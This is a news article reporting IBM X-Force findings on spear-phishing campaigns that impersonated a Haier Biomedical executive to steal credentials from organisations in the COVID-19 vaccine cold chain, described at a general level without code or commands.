Sikov - stock.adobe.com

COVID-19 Vaccine Cold Chain Entities Remain Key Spear-Phishing Target

IBM X-Force released an update of its December COVID-19 Vaccine Cold Chain attacks, finding additional spear-phishing attacks targeting global entities.

Threat actors are continuing to target the COVID-19 vaccine cold chain, the means of delivering and storing vaccines at safe temperatures, with spear-phishing campaigns that leverage pharma and biomedical lures, according to a new IBM X-Force report.

The prime targets of the campaign are the transportation, healthcare, and IT and electronics sectors. Researchers also found the attackers targeting government agencies and vendors that support public health entities, among other targets.

The new research is an update of a December IBM X-Force report that shed light on widespread phishing tactics leveraged by cybercriminals against vaccine supply chain organizations and other healthcare entities.

IBM X-Force established a cyber task force at the beginning of the pandemic to track cyber threats targeting critical infrastructure organizations.

The first global phishing campaigns against cold storage supply chain members were first discovered in September, initially tied to Gavi, the Vaccine Alliance’s Cold Chain Equipment Optimization Platform (CCEOP) program.

The threat actors masqueraded as biomedical executives and targeted enterprise leadership members in the IT, finance, sales, and procurement departments, who would likely be involved with vaccine cold chain efforts.

The attackers sent the messages to multiple employees across the enterprise, with some messages purporting to be help or support pages of the targeted enterprise. Instead, the messages contained malicious HTML attachments that opened locally on the devices and prompted victims to enter user credentials for access.

This week’s update revealed the researchers have detected an additional 50 files tied to spear-phishing emails targeting at least 44 entities in 44 different countries, including the US and Canada.

“The expanded scope of precision targeting includes key organizations likely underpinning the transport, warehousing, storage and ultimate distribution of vaccines,” researchers explained. “Spear-phishing attempts were associated with multiple executive activities and other roles.”

Specifically, the threat actors are targeting CEOs, purchasing managers, system administrators, presidents, heads of supply and logistics, finance directors, HR officers, and a host of other leaders within the enterprise organization.

IBM researchers first observed the latest campaign directly following the publication of the previous report. The malicious email was addressed to a German pharmaceutical and bioscience solutions company working on vaccine production and associated activities.

The target also appeared to be a client of one of the original targets detected in the initial campaign.

Much like the previously disclosed campaigns, the attackers are impersonating an executive from Haier Biomedical, one of China’s largest biomedical companies, which purports to be the only complete cold chain vendor.

The researchers found a range of features that demonstrated the attackers have in-depth knowledge of the cold chain with an established attack pattern. As such, the spear-phishing campaigns remain a “deliberate and calculated threat.”

“Both the email subject and contents discuss requests for quotes regarding the Cold Chain Equipment Optimization Platform (CCEOP) program and contain references to specific products (a specific solar-powered vaccine refrigerator and ice-lined refrigerator) from Haier Biomedical’s product line to store and transport vaccines at the same temperatures of the COVID-19 vaccine,” researchers explained.

The malicious HTML files contained in the emails mention entities tied to solar panel manufacturing and petrochemical production, which align with the cold chain products.

Both campaigns used an overlapping command-and-control (C2) infrastructure and displayed the same blurred PDF with a login screen -- prepopulated with the user’s email address as the ID.

When the victim inputs their credentials, they’re immediately sent to a C2 server. Researchers concluded the campaigns are designed to steal credentials for future or secondary attacks.

The attackers may also be seeking privileged insights into the national procurement of vaccines, as well as the timelines for distribution and the expedited passage of vaccines across countries and territories. Researchers also suggested the campaigns aim to collect or copy electronic document submissions for pre-arrival processing, among other nefarious purposes.

IBM X-Force also provided indicators of compromise to support entities with monitoring and detecting threats that stem from the cold chain targets. Healthcare entities should review previous spear-phishing guidance from Europol, which includes recommended tech.

“While clear attribution remains presently unavailable, the rise of ‘vaccine nationalism’ and increased global competition surrounding access to vaccines suggests the higher likelihood of a nation-state operation, researchers explained.

“The COVID-19 pandemic has created an unprecedented race between rival nations on an unequal economic plane,” they added. “It is almost inevitable to see this type of adversarial activity in a threat landscape that is already extremely active on the nation-state attack front.”

Next Steps

Dig Deeper on Cybersecurity strategies